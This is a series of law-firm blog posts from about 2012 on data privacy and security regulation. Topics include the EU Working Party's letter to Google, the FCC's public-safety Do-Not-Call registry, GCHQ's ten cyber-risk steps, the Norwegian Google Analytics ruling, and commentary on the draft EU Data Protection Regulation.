In an unprecedented step, the CNIL, which had been designated by all the other European Data Protection Authorities (Working Party 29) to carry out this evaluation, arranged for the Working Party 29 (WP29) as a whole, with the signature of all 29 heads of the respective Authorities, to send a highly publicized letter to Google October 16, 2012, with a 10-page document listing a full set of recommendations on how Google should work in order to ensure compliance.

The conclusions of the WP29 are unusually severe despite the previous back-and-forth between Google and the CNIL over the past months:

• Google does not inform its users properly concerning its data processing operations. In other words, the WP29 still considers, as the CNIL did from the very beginning, that it is impossible for users to get a sense of what data will be/is processed by Google, and how.
• Google does not provide any data retention periods. This remark shows growing concern on the part of regulators about data retention and the necessary information to users and regulators any data controller has to provide specifically in that regard, which Google failed to do in the WP29’s view.
• The WP29 urges Google to “modify its practices when combining data across services for these purposes,” not only by being transparent about the data combinations performed across its integrated platform between the various services, but also and primarily in:
  • Obtaining the users’ consent for such combinations (the WP29 suggests that no data combination occurs before the users voluntarily click a “Search Plus Your World” button in that respect)
  • Facilitating the users’ opt-out from such combinations
  • And last, but not least, “adapting the tools used by Google for the combination of data so that it remains limited to the authorized purposes,” in order to differentiate between what belongs to advertisement purposes and what belongs to security

The WP29 also provides explicit guidance on the way such transparency requirements need to be performed: through three-levels of product-specific information displayed to the users; “interactive presentations”; more and explicit information as to the impact of the processing on the users, through the adaptation of such information to mobile users; and last, but not least, through ensuring that passive users are also properly informed.

Also very interesting is the fact that the CNIL outlined in its presentation this week that the WP29 is backed in its request to Google by all Asia Pacific Privacy Authorities, as well as by the Canadian Privacy Commissioner.

The conflict between the CNIL and Google has therefore escalated into a global issue and has been taken up by a significant number of regulators across the world that have adopted a firm common position against Google’s integrated platform. Without any doubt, European regulators and the CNIL in particular, have shown their muscle in what can be seen as a precedent.

This conflict is now entering into a new phase: Google is required to answer to the CNIL, not on how it is processing data, but also on how it will finally comply.

The CNIL has indicated that it would not hesitate to enter into a contentious phase in France if necessary.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Judith L. Harris and Amy S. Mushahwar.

In its Open Meeting today, the Federal Communications Commission ("FCC") placed new obligations on entities that use auto-dialers. “Robocalls” to public safety phone lines, absent an emergency purpose or prior express consent, have long been prohibited under the 1991 Telephone Consumer Protection Act (“TCPA”). However, Congress has continued to be concerned about automatic dialing equipment tying up public safety lines and impeding access to emergency services. Therefore, earlier this year, it acted to address those concerns in the Middle Class Tax Relief and Job Creation Act of 2012 (“Tax Relief Act”). Although there is some overlap between the prohibitions contained in the Tax Relief Act and the TCPA, the Tax Relief Act and today’s FCC Order implementing it create new obligations with which entities using auto-dialers will need to comply, or else risk high monetary fines.

Section 6507 of the Tax Relief Act requires that the FCC: (1) create a Do-Not-Call Registry for phone numbers associated with Public Safety Answering Points (“PSAPs”), not to be confused with the highly popular Do-Not-Call consumer registry administered by the FTC; (2) prohibit the use of automatic dialing or robocall equipment to contact those numbers for non-emergency purposes; and (3) monetarily penalize those entities that disclose for purposes unrelated to compliance, numbers listed on the new Registry, or that use automatic dialing equipment to contact those numbers for non-emergency purposes.

Under the terms of the Tax Relief Act, anyone disclosing or disseminating PSAP phone numbers listed on the Registry will be subject to a monetary penalty of between $100,000 and $1 million per incident. Entities that violate the Tax Relief Act by automatically dialing registered numbers will be subject to a monetary penalty between $10,000 and $100,000 per call. The exact size of the penalty to be imposed in any particular situation will vary depending on factors such as negligence, gross negligence, recklessness, willfulness, and whether the violation is a first or subsequent offense.

On May 22, 2012, the FCC released a Notice of Proposed Rulemaking seeking comments on numerous proposals to implement the Tax Relief Act. Today, the FCC unanimously adopted many of those proposals in a Report and Order in which it: (1) moved to establish the required Registry; (2) made clear that PSAPs would be given a great deal of discretion in deciding which numbers to list on the Registry; (3) emphasized that the use of auto-dialers by anyone, including, for example, schools and charities, to make any calls or send any texts not associated with an emergency purpose to any numbers on the Registry, would be strictly prohibited; (4) created a required certification by any entity seeking access to the Registry that it would not rent, sell or disclose (other than for their intended purpose) the numbers on the Registry; (5) adopted a requirement that auto-dialer operators access the list no more than 31 days prior to auto-dialing; and (6) moved to implement the stringent penalties set forth in the Act.

Finally, in today’s Open Meeting, FCC Chairman Julius Genachowski promised to soon release a Public Notice specifying exactly how the Registry will operate and the date on which the FCC’s new rules will become effective. Moreover, the chairman emphasized that the Agency would be issuing large penalties for violations of the new law and implementing rules, stating “there should be no confusion about that.”

 

Research and drafting assistance for this post was provided by Reed Smith Legal Intern Rachael E. Pashkevich. 

• Print
• Comments
• Trackbacks
• Share Link

Reed Smith attorneys Amy Mushahwar and Joshua Marker, of the firm’s Data Security, Privacy & Management practice, interviewed Travis LeBlanc, California’s Special Assistant Attorney General for Technology. Mr. LeBlanc oversees the California attorney general’s office’s new Privacy Enforcement and Protection Unit. Mr. LeBlanc had a number of interesting insights regarding this new office and indicated that online and mobile privacy, and enforcing privacy protections using existing state and federal laws, will be a particular focus of the state’s enforcement actions.

Please click here to read the entire interview.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Frederick Lah.

Data collection, especially in the context of Do Not Track is an important issue. The FTC has said that an effective Do Not Track system should go beyond opting consumers out of receiving targeted advertisement – it should opt them out of the collection of behavioral data for all purposes, unless the purpose is consistent with the context of the interaction.

Click here to continue reading.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Mark Melodia, Cynthia O'Donoghue, Paul Bond and Frederick Lah.

Next week, Reed Smith will host a conference on “Big Data Monetization” at the Quadrus Conference Center in Silicon Valley (8:30-11:30 a.m. PDT). As we gear up, we wanted to share some of our thoughts on this notion of Big Data and give you a preview of the types of issues we’ll be tackling at the conference.

Big Data is an amorphous term, one that has taken on different meanings in different contexts. In general, Big Data is a term used to characterize the accumulation of data, especially for data sets that may not be usable for analysis by themselves. The term does not just encompass the small subset of companies that actually provides data analytics, or that exists for the sole purpose of monetizing personal information and habit data, but rather extends to any significant company participating in the digital data-driven economy.

Virtually every company, in every industry, is now an information and technology company. Companies run on Big Data, whether it be customer information, employee information, or competitive intelligence. Companies store, share, and use that information in increasingly complex ways, taking advantage of cloud-based solutions and revolutions in analytics, and finding ways to turn these massive databases into revenue – for example, by creating tailored advertisements based on customer shopping preferences or online browsing history. There is no doubt a plethora of opportunities for retailers, health care providers, banks, energy companies, website operators, and data brokers alike in Big Data.

Of course, using Big Data comes with its own set of risks. Companies need to ensure their disclosures are up-to-date and accurate about their information practices, and there may be laws or regulations on the collection and use of information depending on the types of data and data subjects involved. Both Congress and the Federal Trade Commission have also recently raised concerns about data brokers. In addition, some customers may feel uneasy with the notion that a company has too much information about them, thus drawing the attention of class action plaintiffs’ counsel. And, of course, having such deep databases of personal information highlights the importance of keeping information safe and secure. The more valuable information a company holds, the more magnified the threats of data theft and data loss become. The key with monetizing Big Data is striking the balance between risk and reward.

Our Data Privacy, Security & Management team has extensive experience providing privacy compliance advice to clients, drawing upon our knowledge gained in defending more than five dozen privacy class actions and three Multidistrict Litigations; our day-to-day operational experience answering questions from our technology, financial, health, and energy clients; and our diverse skill-set that includes engineers, software developers, cybersecurity and other technology professionals; former regulators and former in-house counsel at global banks; asset managers; and insurers. Earlier this month, Mark Melodia and Paul Bond were featured in the cover story of Law Technology News, “Defending Big Data”. Mark also recently did a podcast on “Defending Big Data”. We continue to stay on top of this area.

At the “Big Data Monetization” conference next week, our panel of experts will be tackling the following types of questions:

• Why should a corporate officer or director or investor care about issues with Big Data?
• What is the current regulatory landscape for Big Data?
• What are the biggest challenges for Big Data as it operates in the United States and globally?
• How does the issue of data ownership arise for Big Data?
• What types of litigation risks exist for Big Data 
• How does the so-called concept of the "right to be forgotten” impact Big Data?
• How does insurance play a role in mitigating the risks that come with Big Data?

We look forward to seeing many of you next week.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

Many companies across a number of industry sectors have experienced some form of cyber attack - attacks which can destroy a company’s financial standing, reputation and potentially its competitive advantage, through the loss of commercially sensitive data. In response, and with the need to access and share information related to cyber attacks more widely amongst businesses, as well as with the technical level of cyber attacks growing exponentially, the information security arm of the UK Government Communication Headquarters (GCHQ) has published an article proposing 10 steps to reduce cyber risk.

The cyber controls recommended to help try and prevent cyber attacks are:

1. Developing a mobile working policy to protect data in both transit and at rest
2. Producing user security policies covering acceptable and secure use of the organisation’s systems and incident reporting. Additionally, ensuring user compliance with the policies and awareness of the cyber risks faced by the organisation.
3. Establishing an incident response and data recovery capability, including training, which should be tested regularly
4. Establishing an effective governance structure, and analysing and quantifying risk levels associated with all data
5. Establishing account management processes to monitor user activity, limit the number of privileged accounts, and delete accounts of outgoing staff
6. Producing a policy to control all access to removable media, limit media types, and implement the scanning of media prior to importing
7. Establishing a continuous monitoring strategy of all information, communication and technology (ICT) systems, and producing supporting policies
8. Applying security patches and ensuring that ICT is securely configured and maintained
9. Establishing anti-malware defences, implementing scans, and producing and continually updating policy on malware
10. Protecting networks against internal and external attacks through security controls such as firewalls, and managing the network perimeter, including filtering out unauthorised access and malicious content

Ultimately, the responsibility and implementation of such cyber security controls rests at board level of any business. GCHQ advise that in order to prevent the loss of company data, which could include personal and sensitive data, management must ensure that the company engages with peers across their sector, the wider business community, and law enforcement authorities to help maintain an awareness and understanding of current and emerging cyber threats.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The Norwegian Data Protection Authority Datatilsynet (Norwegian DPA) has concluded that the use of the website analytic tool Google Analytics by two state agencies violated Norway’s data protection law. The two state agencies—Tax Administration and the State Educational Loan Fund—were not able to account for how Google Analytics worked, and found that there was a disconnect between Google’s privacy policy and that of the state agencies.

Google Analytics is a website tool that allows organizations to create reports about how visitors and users utilize a website, and to analyze visitor and user behavior. Google Analytics is widely used, including by some other European-based data protection authorities, such as the UK Information Commissioner’s Office.

Google Analytics collects part of a visitor’s IP address, which, in a 2011 opinion, the European Court of Justice found to be personal data. The Norwegian DPA found that the agencies should be deemed to control the information collected via Google Analytics cookies, but that it appeared the data was actually collected by Google, thus making Google, rather than the state agencies, the data controller. In addition, the Norwegian DPA determined that neither of the two state agencies could demonstrate that data provided to Google had been anonymized, nor that its use was limited to statistical purposes. The agencies' unconditional acceptance of the terms and conditions appeared to imply that Google could use the IP addresses to provide additional services that would allow them to compile personal information about the visitors from many different websites, and thereby potentially identify the user.

The DPA believed that Google should be functioning as a data processor of each of the agencies; has required both agencies to correct the information on their websites; and has requested that any IP addresses collected are anonymized and used only for analysis. Both state organizations now have a chance to respond to the DPA's findings before a final ruling is made.

This is the first ruling of its nature in the EEA and, in some ways, is surprising given that the collection of IP addresses by Google Analytics cookies tends to be limited by geographic region rather than comprised of the entire IP address. The final ruling will be one to watch, including whether there is a knock-on effect throughout the EEA with other national authorities taking similar decisions about the use of Google Analytics.

 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Paul Bond, Amy S. Mushahwar, and Christine E. Nielsen.

On Tuesday, the Federal Trade Commission (FTC) finalized its Consent Order with MySpace, settling allegations that MySpace misrepresented its data use and sharing practices, and its compliance with the U.S.-EU Safe Harbor Framework in its privacy policy. In a 4-0-1 decision, with Commissioner Maureen Ohlhausen not participating, the Commission voted to accept the proposed order and enjoin MySpace from practices that violate the FTC Act.

Please click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The European Network and Information Security Agency (ENISA) has published a report on ‘Cyber Incident Reporting in the EU’, and has found that many incidents remain undetected or unreported. As a result, the lack of transparency and information on data security breaches makes it difficult for policy makers to understand the overall impact, and to use what could be valuable information to legislate for and prevent future incidents.

Despite the lack of regulatory reports, cyber incidents are extensively covered in the media, be it hacking incidents or ‘acts of God’, such as the communications havoc wrought by the destructive power of the storm known as ‘Dagmar’ in Scandinavia at the end of last year.

In order to address these deficiencies, the report examines existing and planned legislation to cover the requirement for mandatory incident disclosure in the EU. It identifies areas for improvement and looks forward to the coming EU Cyber Security Strategy, which it expects will emphasize incident reporting, and the importance of the exchange of information across the EU concerning cyber incidents and how to address them.

Key to improved European cyber security, suggests ENISA, will be the implementation and increased enforcement of Article 13a of the Telecommunications Regulatory Directive. Amongst other requirements, Article 13a specifies that Member States ensure providers take appropriate technical and organisational measures to manage the risks posed to the security of their networks and services, as well as to ensure that providers notify the national regulatory authorities of any significant breach of security or loss of integrity, and provide reports annually. Furthermore, an ENISA working group for national regulators has developed a single set of security measures and a formal incident reporting format in order to enable a more uniform implementation of Article 13a.

The European Commission is currently developing a European Cyber Security Strategy to implement greater transparency, which ultimately aims to limit cyber security breaches. Additionally the proposed EU Data Protection Regulation will require notification by data controllers of any breach involving personal data to the supervising authority within 24 hours of its discovery, and notification to the data subject without undue delay (subject to exceptions). The report provides a useful overview of existing and planned legislation and the progress being made to address cyber incidents in Europe.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Alexandra Poe, Paul Bond, Keri Bruce, and Frederick Lah.

Last week, the SEC proposed amendments to Rule 506 of Reg D to lift a long-standing ban on advertising for hedge funds and certain other investments. Over the course of the next few weeks, Reed Smith will be releasing a series of blog posts about the various implications this proposed rule may have if it goes into effect. For this post, we consider the potential data privacy implications with the proposed rule.

Hedge funds and other issuers seeking to conduct private offers under Rule 506 of Reg D have long been banned from advertising in public forums like billboards, newspapers, television, or publicly accessible websites. Previously, such issuers could only offer their securities to persons with whom they had a pre-existing substantive relationship based on whether the issuer was able to conclude that the offeree was likely to be an appropriate offeree (i.e., a sophisticated person capable of bearing the financial risk). The ban was designed to prevent issuers that were not subject to full burden of the Securities Act's disclosure and registration requirements from targeting investors whose relative lack of sophistication or bargaining power might prevent them from having all the information necessary to make an informed investment decision. But under the new rules, hedge funds and other issuers would be able comply with Rule 506 and still publicly advertise to anyone, so long as the actual purchasers of the securities are “accredited investors,” as that term is defined in the Rule.

While hedge funds and other Rule 506 companies are now technically permitted to advertise both widespread and publicly, it is dubious that we’ll see hedge funds competing with major consumer brands for prime advertising real estate. A more likely scenario will be that hedge funds will become more aggressive buyers in the information market, and will use that information to tailor their advertising efforts to customers likely to be “accredited investors.” Perhaps this will take the form of email marketing campaigns, direct phone marketing, or possibly even online targeted advertising, for example, on a mutual fund or brokerage firm’s website. Each of these types of advertising comes with its own unique set of privacy considerations. It should also be noted that this new avenue of information-sharing then becomes a compliance consideration for both the hedge fund and the information provider. For example, if a financial institution ends up providing such information to a hedge fund, the financial institution may need to update its privacy policy accordingly to make sure it is complying with regulatory requirements.

The extent to which hedge funds and other issuers seeking to comply with Rule 506 will take advantage of these proposed rules (once and as adopted), if at all, remains to be seen. The resultant data privacy implications will vary depending on the exact advertising measures employed. We will be monitoring this situation for developments.

 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Amy S. Mushahwar and Christine E. Nielsen.

 As we have previously reported,  the Department of Commerce privacy white paper, Consumer Data Privacy in a Networked World: A Framework for Protecting Privacy and Promoting Innovation in the Global Digital Economy, sets forth baseline principles for a consumer privacy bill of rights, which can serve as a template for comprehensive privacy protections. Those principles – individual control; transparency; respect for context, security, access and accuracy; focused collection; and accountability – track the Fair Information Practice Principles (FIPPs). Commerce’s report calls upon interested stakeholders to participate in forums to develop legally enforceable codes of conduct based on these principles. The National Telecommunications and Information Administration (NTIA) convened stakeholder meetings July 12, August 22 and August 29 that began to tackle the first issue for the codes of conduct, mobile application transparency.

NTIA is using a polling approach whereby concepts are raised by the stakeholders, and then the group votes in a non-binding poll to determine which concepts should be tackled first, and which are lower priority and can be set aside to address later. Though there was much discussion about the effectiveness of this methodology, on July 12 the multi-stakeholder group identified many elements of mobile application transparency that should be advanced in a code of conduct. The August 22 meeting focused more on the approach to the meetings and process for moving forward, and the August 29 meeting returned to the issues at hand.

At the outset of the August 29 meeting, the stakeholders were asked to vote on the substantive elements related to mobile application transparency that they believed should be worked on first for the codes of conduct. The stakeholders who participated in the meeting were almost unanimous in their selection of the definition of a “mobile application” as being the most important element to tackle first. In addition, the multi-stakeholder group believes that defining the scope of the recommendations and ensuring that recommendations are technologically neutral and platform agnostic, are very important elements to address at the outset.

In addition to discussing which elements of mobile application transparency deserved attention, the group discussed the scheduling of briefings from application developers, others familiar with application technology, and those who could speak to the current self-regulatory standards. Such briefings would level the knowledge playing field between stakeholders, and facilitate a discussion about the definition of mobile application and common practices of mobile app data use.

The NTIA is blogging about the meetings, and the stakeholders have set up a website to allow all interested stakeholders to share ideas and information, and comment on the process. As the meetings and forums progress, we will continue to report updates and highlights.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (“ICO”) has issued guidance on the deletion of personal data. Through this guidance, the ICO seeks to assist organisations with their obligations under the Data Protection Act 1998 (“DPA”) and to promote good practice. The ICO acknowledges that times have changed and that, while one may think placing data in a "recycle" bin deletes data, some electronic form of personal data and documents most likely still exist on a system.

ICO rues any impression given by organisations to its users that deletion of data is absolute. The ICO wants organisations to be absolutely clear on what is meant by deletion and what happens to personal data once deleted. The ICO recounted instances of organisations having run into difficulty where “deleted” data had in fact only been archived and was capable of being reinstated. Where the data has been archived and not permanently deleted, the ICO urges organisations to safeguard such data.

The ICO highlights the “significant difference” between irretrievably deleting information and archiving it in a structured, retrievable manner, and retaining random data in a recycle bin. While the ICO states that archived data should be treated the same as live data, it acknowledges that inert data is less likely to have a detrimental effect on an individual.

While deleting system data may not always be straightforward, the ICO suggests that putting data "beyond use" may suspend data protection compliance issues so long as certain safeguards exist, such as:

• There is no intention to use or access the data
• No other organisation is given access to the data
• The personal data is protected by appropriate technical and organisational security
• There is a commitment to permanently delete the data when technically feasible

For data put "beyond use," the ICO suspends the right of individuals to access that data and, most importantly, will not take any enforcement action against organisations that retain such data, despite the DPA principle not to keep data for longer than necessary. The ICO acknowledges that data put "beyond use" may still need to be provided to comply with court orders.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The European Commission (“EC”) has launched a public consultation on Improving Network and Information Security (“NIS”) in the EU, and is seeking the views of governments, businesses and citizens about their experiences and a proposed European response to cyber incidents.

The EC recognizes that NIS systems underpin complex computer systems in the finance and health sectors, and that NIS security incidents are on the rise. The consultation is aimed at helping the EC prepare a legislative proposal on network and information security, and to draw together ideas on countering cyber crime across Europe. In particular, the EC will look at “future risk management and security breach reporting requirements”.

In key questions, the consultation asks participants to give details of: (1) recent NIS incidents and their causes; (2) attempts to establish users’ awareness of cyber threats; and (3) the level of cyber security in the EU and effective ways of managing NIS risks. The consultation will also assist with the forthcoming joint strategy on cyber security produced by the EC and EU High Representative for Foreign Affairs and Security Policy. The consultation runs until 12 October 2012.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Timothy J. Nagle and Gunjan Talati.

On Friday, August 24, the Federal Acquisition Regulation (“FAR”) Council issued a proposed rule that adds a subpart and contract clause to the FAR that would force government contractors to implement basic information-systems safeguards for any non-public information that is provided by or generated for the government. While the proposed rule is intended to plug a hole in the FAR that does not currently require such safeguards, the draft of the rule is so broad that it is not clear what holes it will actually plug. Rather, what we do know is that it adds yet another FAR clause in government contracts to an already long list that companies will have to monitor for compliance. Comments to the proposed rule are due no later than October 23, 2012.

At the outset, we note that the proposed rule does not appear to change security standards. Rather, it appears to expand (without being sufficiently precise) the applicability of the standards. Specifically, the Federal Information Security Management Act (FISMA) of 2002, 44 U.S.C. 3544, states:

(a) In General.— The head of each agency shall— 
(1) be responsible for— 
(A) providing information security protections commensurate with the risk and magnitude of  the harm resulting from unauthorized access, use, disclosure, disruption, modification, or destruction of—
(i) information collected or maintained by or on behalf of the agency; and
(ii) information systems used or operated by an agency or by a contractor of an agency or other organization on behalf of an agency;  [emphasis added].

Thus, agencies already have a duty to identify possible security holes and mitigate risks.

The proposed rule does not change the FISMA requirements. Rather, the proposed rule seeks to “apply the following basic safeguarding requirements to protect information provided by or generated for the Government (other than public information) which resides on or transits through its information systems from unauthorized access and disclosure.”

While there is a definition for “information system” in the proposed rule, it is broad and encompasses just about any information that is not already public. The definition also fails to identify what a “Contractor” information system really is under the rule. There is no clear delineation in the proposed rule between an information system operated by a contractor on behalf of an agency and one operated by just a contractor.

Also, the rule does not supersede any specific safeguards spelled out in a contract. A government contract or statement of work will usually describe the technical requirements and boundaries of an information system required to provide the specified services, and a contractor can price the equipment, technical support and policy development into its bid. And most government contracts will require the contractor to maintain the system to government (FISMA) security standards and be subject to certification and accreditation with subsequent audits. This does not change, and therefore the rule may be of little practical value to contractors that already have such safeguards spelled out in their contracts.

One concern is that the proposed rule might be interpreted to mean that the corporate network of the contractor, which does not directly support any government contract work, is now subject to government standards, inspection and audit if it processes or stores any government information. This could potentially include contract invoices, reports, pricing information or any other documents and data required for contract administration. Without more clarity, no program manager or CIO will know the extent of potential government supervision of their corporate network. Such an interpretation would unnecessarily extend the reach of FISMA. The risk of such interpretations makes it likely this proposed rule will be challenged on several fronts.

If the rule is not challenged and implemented as drafted, contractors will need to ensure that their systems comply. Exactly what constitutes the appropriate basic safeguards would surely vary from company to company with few bright lines. Additionally, the government could take the position that a contractor’s safeguards do not meet the requirements of the rule and use it as a basis for claims, termination for default, and possibly even suspension and debarment (for failing to have adequate internal controls).

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Amy S. Mushahwar, Frederick Lah, and Christine E. Nielsen.

On August 21, Jumptap and Evidon announced a partnership to create and implement the AdChoices icon in mobile web and mobile app advertisements. Evidon, one of the earliest providers of privacy solutions that comply with the Digital Advertising Alliance (“DAA”) Self-Regulatory Program for Online Behavioral Advertising, utilizes an icon to let consumers know when their web browsing is being tracked for targeted advertising. Under the partnership, when Jumptap serves a mobile ad, that ad will notify consumers if they are being targeted with behavioral ads using Evidon’s privacy solution.

Under the new program, the AdChoices icon will appear on users’ device screens, signaling the use of behavioral targeting. This icon is the same one developed under the DAA’s program for behavioral advertising, and will now be rolled out in the mobile space. If a user clicks on the icon, he or she will be redirected to Jumptap’s Privacy Overview page, where the user will be provided with more information about targeted mobile ads and how to update his or her privacy options.

Companies engaged in behavioral advertising continue to take measures to demonstrate that self-regulation is effective and legislation is therefore unnecessary. The DAA’s AdChoices program has been far reaching, serving more than 50 billion privacy notices to consumers each month. In addition, the World Wide Consortium and web browsers offer do-not-track solutions.

The mobile privacy space has been very active over the past year as more and more companies continue to focus their efforts in mobile. We have been following these issues very closely, and blog about the issues frequently. Click here for our prior posts about the New Jersey AG's lawsuit with mobile app developer 24x7 Digital, and here for our post on the California AG's agreement with the six major mobile app platform providers on mobile app developers' privacy disclosures.

We've also covered litigation over the alleged privacy practices of mobile app providers here.

As the litigation and regulatory landscape continues to develop, and as uncertainty lingers as to if and when regulation will be passed, companies engaging in behavioral advertising in the mobile space should take solace where they can. Participating in and implementing self-regulatory solutions – like the AdChoices icon – is a good place to start.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The Business Innovations and Skills Department of the UK Government has issued a public consultation on a proposal to create a requirement on suppliers of goods and services to provide their customers, when requested, with information on historic transactions and consumption data in an open standard, machine-readable format. The proposed new power is part of the government’s “midata” strategy. Although the Data Protection Act 1998 (“DPA”) allows for subject access to personal data, this law only requires data controllers to provide information in “an intelligible form”. The new requirement would go further.

The government has commented that the new requirement would only relate to transaction data, covering only factual information and existing electronic data, and would not cover any subsequent analysis by the data holder. The government is considering whether this will be a general power or whether it will be exercised in a more targeted way, and who will be able to request the data.

The consultation asks a number of questions around the form and categories of data that should be covered, including what data would be most helpful to consumers, time periods and format. An additional question relates to which government bodies should be able to enforce the “midata” strategy, with options including the Information Commissioner’s Office. The consultation closes 10 September 2012.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue and Katharina Weimer.

The Schleswig-Holstein data protection authority (“ULD”) has published a series of recommendations on how to provide and use cloud computing services in a way that is compliant with German and European data protection laws. The recommendations are based on the Article 29 Working Party (the “Working Party”) Opinion on cloud computing (see our client alert), which analysed the applicable European data protection laws and provided guidelines to both cloud providers and clients. The ULD stated that from a data protection perspective, the processing of personal data in relation to cloud computing posed two specific risks: (1) the lack of control over the data for the cloud client because of the number of data processors (and sub-processors), and the transfer of personal data to countries outside the EEA; and (2) the lack of information provided as to where, how and by whom the data is being processed in the cloud.

The ULD echoed the guidance of the Working Party, stating that the cloud client is the data controller and the cloud provider is the data processor, and this will be the case regardless of the size of the business. The ULD does not accept the imbalance of power between an SME (small or medium enterprise) and a large-scale international cloud provider as a justification to accept clauses or terms that do not comply with data protection law. Furthermore, the ULD states that the relationship should be governed by a contract that complies with the applicable data protection law and sets forth the duty of the cloud provider to inform the client about all sub-processors and all locations where data may be stored or processed.

The ULD comments that data may be transferred outside the EEA only if legal requirements such as the standard contractual clauses or binding corporate rules are in place. Also, the ULD reiterates the Working Party’s comment that a cloud client should not rely on a statement from the provider that it has self-certified compliance with the Safe Harbor framework principles, but should obtain evidence that all data protection principles are complied with.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

Macau, Hong Kong and Taiwan have been flexing their data protection muscles. Macau’s Office for Personal Data Protection (“OPDP”) is investigating the transfer of data from the Asian subsidiary of Las Vegas Sands to the United States. Hong Kong has just passed the Personal Data (Privacy) (Amendment) Ordinance that increases penalties and introduces new offences. Taiwan has added stronger enforcement powers to its Personal Information Protection Act (“PIPA”).

In Macau, the OPDP is investigating Sands China Limited’s subsidiary, Venetian Macau Limited, for potential violations of Macau's privacy laws, which prohibit the unsanctioned transfer of personal data to foreign jurisdictions, such as to the United States. The investigation relates to the movement of files from Macau to the United States relevant to a 2010 lawsuit. Violations of Macau's 2005 Personal Data Protection Act (“PDPA”) can be subject to civil and criminal penalties, with fines per violation of 80,000MOP (around $10,000) and a maximum jail sentence of two years. Macau has previously fined Google 30,000MOP for breaching the PDPA.

Hong Kong enacted an amendment to the Personal Data (Privacy) Ordinance passed in June, 2012. However, most provisions will come into effect 1 October 2012. The changes particularly affect organisations engaged in direct marketing or that provide data for direct marketing. The Privacy Commissioner’s Office (“PCO”) is scheduled to provide guidance on the new compliance regime, which includes enforcement powers for the PCO such as fines of between HK$500,000 and HK$1 million ($64,500 - $129,000). The maximum fine is for a new offence designed to address malicious disclosure of personal data without consent, where the perpetrator has made financial gain, caused financial loss, or caused psychological harm to the data subject. The new law also includes:

• An exemption relating to the use of personal data in relation to due diligence
• Requirements for data users to adopt contractual means to prevent personal data that has been transferred to a data controller from being kept longer than necessary, and to prevent unauthorised access, unauthorised use or loss of personal data 
• A new right for individuals who have suffered harm as a result of a breach of the Data Protection Law to apply to the PCO for assistance

Taiwan amended its Computer Processed Personal Data Protection Act (“CPPDPA”) more than two years ago when it enacted the new Personal Information Protection Act (“PIPA”). PIPA is finally set to come into force next year, but the legislature can continue to make further amendments up until 30 April 2012. Enforcement under the old CPPDPA had been haphazard and intermittent, mainly because there has been no single agency responsible for enforcement. Under PIPA, the Ministry of Justice has been identified as the agency responsible for coordinating enforcement. Recently, however, Taiwan’s financial services regulator (the “FSC”) imposed substantial fines against banks on privacy-related grounds, rather than wait for PIPA to be enacted. In March 2012, the FSC fined two insurance brokers NT$600,000 ($20,000) each for illegally releasing personal data to a life insurance company.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The Council of the European Union has published a new review detailing comments on the draft proposal for a General Data Protection Regulation (“Draft Regulation” or “Regulation”). Building on comments made in the DAPIX document, the review contains comments from each EU Member State with suggested changes to the first and second chapters of the Draft Regulation.

Most of the Member States commented on the excessive number of delegated acts which allow the European Commission considerable powers of discretion, and many sought to delete some, if not all, of those delegated acts. Other general comments focused on the territorial and material scope of the Regulation and the fact that some Member States would have preferred a directive (requiring national implementing legislation) to a regulation (direct effect).

Many of the Member States highlighted similar issues with Articles 1-10 of the Draft Regulation, namely:

• In relation to Article 1 (subject matter and objectives), revision or deletion of paragraph 3 as its impact could reduce the scope of the right to protection of personal data.
• Frequent comments on Article 2 (material scope) paragraph 2(2)(d) are that the exemption does not take into account the ECJ judgment in Lindquist, where data is made available on the Internet; that the exemption under 2(2)(b) for EU institutions, bodies, offices and agencies should be deleted; and that the concept of ‘national security’ in 2(2)(a) is too vague.
• The extension of jurisdiction in Article 3 (territorial scope) outside of the EU was considered unworkable and potentially unenforceable.
• A change to the definition of ‘personal data’ in Article 4 to include anonymised and/or pseudonymised data, and that the definitions of genetic data, biometric data and data concerning health, were all too wide.
• Article 5 (principles relating to personal data processing) should give greater consideration to the use of pseudonymised data, and that paragraph (f) was considered too general and imprecise, thus creating an excessive liability on a data processor.
• Most Member States had drafting issues or additions to Article 6 (lawfulness of processing), including in relation to processing for ‘legitimate interests’.
• Member States welcomed the provision that the controller shall bear the burden of proof for obtaining the data subject’s consent in Article 7 (Conditions for consent), although some questioned the form of consent required.
• Almost all of the Member States had issues with the intended scope of Article 8 (Processing of child personal data), questioning how controllers are supposed to identify and verify the age of children online, and may interfere with national age limits and systems.
• In relation to Article 9 (processing special categories of data), Member States questioned whether consent was required in all cases and whether ‘beliefs’ was considered to be too wide.
• Most Member States had reservations around the wording of Article 10 (Processing not allowing identification), either querying its necessity or questioning its meaning and opting for its deletion.

The document will be discussed in greater detail in our upcoming Client Alert. We will issue Part 2 when the next stage of the review is published.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

Back in January of this year, the European Commission published its proposed framework to replace the Data Protection Directive (95/46/EC). Shortly after, the UK Ministry of Justice (MOJ) issued a Call for Evidence, which sought information on the potential impact of the draft EU Data Protection Regulation and accompanying directive for law enforcement (‘Framework’). At the end of June, the MOJ published a summary of the responses. The MOJ received input from 143 organisations from various sectors, including advertising, financial services, technology and telecoms, media and the legal field. The responses will be used to help the UK Government reach an informed view on the Framework.

The majority of respondents recognised the need for change to the current data protection law and were positive about the change being in the form of a regulation. Members of the public and certain rights groups particularly felt that the Framework did a good job of addressing key consumer concerns and gave individuals more rights to control how their personal data is processed.

